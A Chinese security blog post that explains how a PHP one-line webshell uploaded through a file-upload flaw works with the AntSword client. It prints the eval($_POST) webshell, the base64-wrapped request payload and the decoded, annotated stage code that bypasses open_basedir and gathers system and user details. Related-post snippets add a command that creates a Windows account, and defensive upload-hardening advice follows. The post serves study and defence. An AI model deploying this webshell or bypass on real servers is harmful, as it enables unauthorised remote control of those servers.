WEB安全--文件上传漏洞--一句话木马的工作方式

已于 2025-03-31 16:06:49 修改
阅读量657 收藏 6
点赞数 7
分类专栏: 文件上传漏洞 文章标签: web安全 安全 网络 文件上传漏洞
于 2025-03-31 12:10:16 首次发布

写这篇文章我的想法是,在了解文件上传漏洞之前,我们应该知道为什么要上传webshell,就像在我们磨刀之前应该要知道我们要拿刀来干啥 : )

以一句话木马来说,就单凭一小行代码怎么能做到控制别人的服务器的呢?这是值得思考的,所以请看下文。

首先,我已经上传了一句话木马:

接下来通过对蚁剑传输流量的抓包分析:

我们能看到传输数据的字段有一大段编码和两个变量,它的工作原理是:


分为了两个字段

1:e002eeda8c12f5=[省略]

2:oupeng=eval(base64_decode($_POST('e002eeda8c12f5')))

第一个字段是base64编码后的值,解码后其内容是:

<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
    $ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
    @array_push($oparr,$ocwd,sys_get_temp_dir());
    foreach($oparr as $item) {
        if(!@is_writable($item)){continue;};
        $tmdir=$item."/0ac4da9ca";
        @mkdir($tmdir);
        if(!@file_exists($tmdir)){continue;}
        $tmdir=realpath($tmdir);
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr=@preg_split("/\\\\|\\//",$tmdir);
        for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");}
        @ini_set("open_basedir","/");
        @rmdir($tmdir);
        break;
    };
};;
function asenc($out){return $out;};
function asoutput(){$output=ob_get_contents();ob_end_clean();echo "f9b9d"."abb3d6";echo @asenc($output);echo "c84a1"."5b471";}
ob_start();
try{
    $D=dirname($_SERVER["SCRIPT_FILENAME"]);
    if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
    $R="{$D}	";
    if(substr($D,0,1)!="/"){foreach(range("C","Z")as$L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}
    $R.="	";
    $u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
    $s=($u)?$u["name"]:@get_current_user();
    $R.=php_uname();
    $R.="	{$s}";
    echo $R;
}catch(Exception $e){echo "ERROR://".$e->getMessage();}
asoutput();
die();
?>

第二个字段则是先用 $_POST('e002eeda8c12f5') 接到这段编码

然后用eval(base64_decode())的方式把它解码,这里嵌套的目的是用eval()执行base64_decode()

于是我们就能用oupeng接到解码后的代码

最后我们在回过头看我们的一句话木马:

eval($_POST['oupeng']);

也就是说最后蚁剑将处理后的值赋给oupeng这个变量,

然后网站中的一句话木马中的$_POST['oupe]接到这个变量,也就是接到这些代码,

最后再利用eval()在网站中执行这些代码

代码作用如下:
 

<?php
// 禁止显示错误信息
@ini_set("display_errors", "0");
// 设置脚本执行时间不限制
@set_time_limit(0);

// 获取 PHP 配置中的 open_basedir 值
$opdir=@ini_get("open_basedir");
if($opdir) {
    // 获取当前脚本所在目录
    $ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
    // 使用 base64 解码后进行拆分
    $oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
    // 将当前目录和系统临时目录添加到数组中
    @array_push($oparr,$ocwd,sys_get_temp_dir());
    foreach($oparr as $item) {
        // 如果目录不可写,则继续循环
        if(!@is_writable($item)){continue;};
        // 创建一个临时目录
        $tmdir=$item."/0ac4da9ca";
        @mkdir($tmdir);
        // 如果目录不存在,则继续循环
        if(!@file_exists($tmdir)){continue;}
        // 获取临时目录的绝对路径
        $tmdir=realpath($tmdir);
        // 进入临时目录
        @chdir($tmdir);
        // 修改 open_basedir 为上一级目录
        @ini_set("open_basedir", "..");
        // 将路径按斜杠分隔成数组
        $cntarr=@preg_split("/\\\\|\\//",$tmdir);
        // 循环返回上级目录,直到根目录
        for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");}
        // 恢复 open_basedir 为根目录
        @ini_set("open_basedir","/");
        // 删除临时目录
        @rmdir($tmdir);
        break;
    };
};

// 定义函数 asenc,无实际操作,直接返回输入
function asenc($out){return $out;};
// 定义函数 asoutput,将输出内容进行一些处理后输出
function asoutput(){$output=ob_get_contents();ob_end_clean();echo "f9b9d"."abb3d6";echo @asenc($output);echo "c84a1"."5b471";}
// 开始输出缓冲区
ob_start();
try{
    // 获取当前脚本所在目录
    $D=dirname($_SERVER["SCRIPT_FILENAME"]);
    // 如果为空,则获取当前路径的上一级目录
    if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
    // 将当前目录信息存入变量 $R
    $R="{$D}	";
    // 如果路径不是绝对路径,则循环遍历 A 到 Z 盘符,获取可用盘符
    if(substr($D,0,1)!="/"){foreach(range("C","Z")as$L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}
    // 添加分隔符和系统信息
    $R.="	";
    // 获取当前用户信息
    $u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
    $s=($u)?$u["name"]:@get_current_user();
    // 添加系统信息和当前用户信息到变量 $R
    $R.=php_uname();
    $R.="	{$s}";
    // 输出变量 $R
    echo $R;
}catch(Exception $e){
    // 如果出现异常,则输出错误信息
    echo "ERROR://".$e->getMessage();
}
// 输出经过处理的内容
asoutput();
// 结束脚本
die();
?>

文件上传句话木马getshell
qq_41620273的博客
12-25 5988
文件上传 文件上传流程: a.文件表单提交 b.生成临时文件(读取临时文件信息) c.后端语言判断该文件是否合规 d.合规则保存文件 句话木马: 1.在phpstudy搭建的站点www目录下写入个php文件,访问该网站下的php文件成功: 命令执行函数:system()、Exec()、 Shell_exec() passthru(): 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上 1.如url中输入:XXXX/1.php?a=net user mqu sss /add
web安全-7-文件上传和文件包含漏洞
qq_57410330的博客
04-07 1264
内容为文件上传漏洞与文件包含漏洞
文件上传漏洞以及句话木马
SY_China27的博客
11-01 1256
文件上传web系统中常见的种功能,通过文件能上传各种类型的文件,这其中随着web包含的功能越来越多,也变得越来越大恶意用户上传了,就会导致网站被其控制,甚至会使其服务器沦陷,以至于引发恶意的网络安全事件。
文件上传漏洞句话木马
meiqianchifanle的博客
06-19 380
Webshell 是种恶意脚本或程序,通常以网页文件(如.php.jsp.asp.aspx等)的形式存在。它被攻击者上传或植入到目标 Web 服务器的网站目录中,目的是在服务器上建立个,从而实现对服务器的远程控制。
文件上传漏洞------句话木马原理解析
m0_69151365的博客
03-11 3595
这是个最简单的句话木马,我们用GET传参接受了两个参数,其最终目的是构造出:assert($_GET['1']) -> assert(eval(phpinfo()))这样的语句。我们也可以直接构造eval,但是很容易被杀,在我个人电脑上我们可以关闭保护软件,但是我们可以关闭网站服务器的杀毒软件吗?这串代码是在对上个代码进行base64解码,完了我们还要执行assert(eval(muma)) 这就是句话木马的总体原理。我们设置成不允许,刷新靶场再次上传木马文件发现上传成功了。接下来就开始抓包了。
Web安全威胁:文件上传漏洞句话木马详解
tengyuehou的博客
04-06 983
文件上传漏洞是发生在有上传功能的应用中,如果应用程序对用户的上传文件没有控制或者存在缺陷,攻击者可以利用应用上传功能存在的缺陷,上传木马、病毒等有危害的文件到服务器上面,控制服务器。文件上传漏洞产生的主要原因是:应用中存在上传功能,但是上传的文件没有经过严格的合法性检验或者检验函数存在缺陷,导致可以上传木马文件到服务器文件上传漏洞危害极大是因为可以直接上传恶意代码到服务器上,可能会造成服务器的网页篡改、网站被挂马、服务器被远程控制、被安装后门等严重的后果。
web安全技术-实验六、文件上传漏洞.doc
08-20
5. **注入句话木马**:句话木马,顾名思义,是小型、简洁的恶意脚本,通常只有行代码,可以被嵌入到文件中。文件上传成功,攻击者可以通过执行这个木马来获取服务器的控制。 6. **安全等级提升至"medium...
web安全---文件上传漏洞
m0_65129142的博客
12-12 505
文件上传功能模块 文件上传功能是大部分WEB应用的必备功能,网站允许用户自行上传头像、些社交类网站允许用户上传照片、些服务类网站需要用户上传证明材料的电子档、电商类网站允许用户上传图片展示商品情况等。然而,看似不起眼的文件上传功能如果没有做好安全防护措施,就存在巨大的安全风险。 文件上传漏洞原理 当用户在在文件上传的功能模块处上传文件时,如果WEB应用在文件上传过程中没有对文件的安全性进行有效的校验,攻击者可以通过上传WEBshell等恶意文件对服务器进行攻击,这种情况下认为系统存在文件上传漏洞。 文
网络安全实验-文件上传漏洞、文件包含漏洞、CSRF漏洞
qlbahuang的博客
07-21 1684
网络安全实验:文件上传,文件包含,CSRF
Web安全--文件上传漏洞
bobo_milk的博客
11-11 1220
本文参考了些文章,如有侵权请留言删除。该文章基于upload-labs基础靶场进行编写。
上传漏洞句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
qq_53058639的博客
03-16 2576
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每个知识点,我都有配套的视频讲解。
文件上传句话木马
kami_kami的博客
01-17 1391
先写好句话木马()(可先用记事本写,后将后缀改为php),想办法将这个php文件上传到需要入侵的网站,上传成功后,打开蚁剑,新建数据,将网站的URL网址粘贴进去,再填入密码(上面木马的[]中的1即为密码,可自己设定),后点测试连接,成功后点添加。然后双击添加的数据即可访问网站对应的服务器,在其中可找到flag(般在根目录下,根目录就是\)
Web木马文件上传漏洞
weixin_62707591的博客
06-20 3944
目录 、认识Web木马 1.1 木马概念 1.2 web木马危害 1.2.1 攻击者留后门 1.2.2 文件、数据库操作 1.2.3 修改web页面 1.3 Web 木马特点 1.3.1Web木马可大可小 1.3.2 无法有效隐藏 1.3.3 具有明显特征值 1.3.4 必须为可执行的网页格式: 1.4 Web木马分类 1.4.1 句话木马 1.4.2 大马小马 二、初识文件上传漏洞 2.1 文件上传漏洞的概念 2.2 文件上传漏洞的危害 2.2.1 非授权用户的越
文件上传漏洞
WYJ____的博客
08-06 835
预备知识 【BurpSuite】的基本使用 客户端javascript检测的原理 【中国菜刀】的基本使用 实验目的 绕过JavaScript验证检测,上传句话木马。 实验工具 BurpSuite、中国菜刀、句话木马 实验环境 服务器台(Windows Server 2003)客户机台(windows Server 2003) 实验步骤 第步:打开下方网页,上传事先准...
文件上传漏洞句话木马)(学习笔记)
2401_86737011的博客
10-16 1874
将这个按键打开,现在就处于抓包状态了,浏览器发出的数据包都会被我们截获,然后我们可以对数据包进行修改,现在可以去点击提交了。由于管理员对文件上传没有进行安全过滤操作,我们可以通过文件上传漏洞来上传些危险的东西来获得服务器的控制权。发现报错了,说明.php后缀是不能上传的,那么我们可以把他改为.png上传,然后在burp中抓包修改。然后先不要点提交,因为上传png文件上去我们不能使用里面的句话木马,我们现在打开burp来抓包。发现成功上传了我们的句话木马,现在对方的服务器里就有我们的木马文件了。
上传文件注入(附带句话木马)
m0_50818626的博客
05-27 1096
发现order by 6的时候还是正常的,当order by 7 的时候却出现问题了,判断字段数有6个。跟上'之后 没有输出了,而跟上 -- qwe 将后面注释掉以后又恢复正常了,判断此处为注入点。这里的URL地址就是咱们上传的句话木马php文件的地址,密码就是我们POST上传的参数。>就是我们上传的句话木马啦。如上图所示,有很明显的传参地点,我们选择在id=13后面跟个'判断是否有注入点。到我们最关键的步了,我们在输出位上跟上以下语句。我们就可以对对方的数据库为所欲为啦。四、上传句话木马
中国蚁剑简介
m0_73721944的博客
03-28 2461
句话木马:在很多的渗透过程中,渗透人员会上传句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此。中国蚁剑和中国菜刀类似,是webshell终端管理工具,主要面向合法授权的渗透测试安全人员及常规操作的管理员。(1)php的代码要写在
利用任意文件上传漏洞上传句话木马
最新发布
07-20
### 防范任意文件上传漏洞句话木马攻击 任意文件上传漏洞Web应用中常见的安全隐患,攻击者可以利用该漏洞上传恶意文件(如句话木马),从而实现远程代码执行或服务器控制。为了有效防范此类攻击,可以从以下几个方面入手: #### 1. 文件类型限制 限制用户上传的文件类型,仅允许上传特定格式的文件。例如,只允许上传图片文件(如`.jpg`、`.png`)时,可以通过检查文件扩展名或MIME类型来实现限制。但需注意,**MIME类型和扩展名检查均可被绕过**,因此应结合其他手段进行验证[^3]。 ```python # 示例:检查文件扩展名 def allowed_file(filename): allowed_extensions = {'jpg', 'jpeg', 'png', 'gif'} return '.' in filename and filename.rsplit('.', 1)[1].lower() in allowed_extensions ``` #### 2. 文件内容验证 对上传的文件内容进行深度验证,例如使用`getimagesize()`函数检查是否为真实图片文件。然而,这种验证方式仍可能被包含句话木马的图片文件绕过,因此需要结合其他安全机制[^4]。 ```php // PHP 示例:使用 getimagesize 检查是否为图片 if (getimagesize($_FILES['file']['tmp_name']) === false) { die("上传的文件不是图片"); } ``` #### 3. 文件存储路径控制 上传的文件不应直接存放在Web根目录下,而应存储在非Web访问路径的独立目录中。此外,上传后的文件应使用随机生成的文件名,避免攻击者通过猜测路径访问恶意文件[^1]。 ```php // PHP 示例:使用随机文件名 $upload_dir = "/var/www/uploads/"; $random_name = bin2hex(random_bytes(16)) . "." . pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION); move_uploaded_file($_FILES['file']['tmp_name'], $upload_dir . $random_name); ``` #### 4. 权限与认证控制 对上传功能进行严格的权限控制,确保只有经过认证和授权的用户才能执行文件上传操作。此外,应限制上传页面的访问权限,防止未授权访问[^5]。 #### 5. 安全编码与框架支持 使用安全的开发框架和库,避免手动处理文件上传逻辑。例如,在使用PHP时可以借助Laravel等框架自带的上传验证机制,减少人为错误带来的安全风险。 #### 6. Web服务器配置 配置Web服务器(如Apache、Nginx)以防止上传目录中执行脚本。例如,可以在上传目录的`.htaccess`文件中添加限制,禁止执行PHP脚本: ```apache <FilesMatch "\.(php|php5|php7|phtml)$"> Deny from all </FilesMatch> ``` #### 7. 安全检测与监控 部署Web应用防火墙(WAF)或入侵检测系统(IDS),实时监控上传行为,识别异常文件并及时告警。同时,定期进行安全扫描与渗透测试,发现潜在漏洞并修复。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值